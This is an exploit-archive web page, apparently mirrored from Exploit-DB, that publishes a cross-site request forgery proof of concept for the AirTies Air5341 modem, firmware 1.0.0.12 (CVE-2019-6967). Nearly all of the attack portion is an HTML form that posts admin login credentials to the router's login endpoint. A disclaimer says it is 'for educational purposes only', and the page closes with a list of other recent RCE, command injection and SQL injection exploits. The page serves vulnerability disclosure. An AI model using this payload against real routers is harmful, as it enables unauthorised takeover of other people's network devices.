Airties air5341 modem 1.0.0.12 crosssite request forgery Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-01-28 | Type : webapps | Platform : hardware
This exploit / vulnerability Airties air5341 modem 1.0.0.12 crosssite request forgery is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: AirTies Air5341 1.0.0.12 Modem CSRF Exploit & PoC
# Version: AirTies Modem Firmware 1.0.0.12
# Tested on: Windows 10 x64
# CVE : CVE-2019-6967
# Author : Ali Can Gönüllü

<html>
<form method="POST" name="formlogin" action="
http://192.168.2.1/cgi-bin/login" target="_top" id="uiPostForm">
<input type="hidden" id="redirect" name="redirect">
<input type="hidden" id="self" name="self">
<input name="user" type="text" id="uiPostGetPage" value="admin"
size="">
<input name="password" type="password" id="uiPostPassword" size="">
<input onclick="uiDologin();" name="gonder" type="submit"
class="buton_text" id="__ML_ok" value="TAMAM"
style="background-image:url(images/buton_bg2.gif); height:21px;
width:110px; border: 0pt none">
</form>
</html>

Airties air5341 modem 1.0.0.12 crosssite request forgery


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Airties air5341 modem 1.0.0.12 crosssite request forgery Vulnerability / Exploit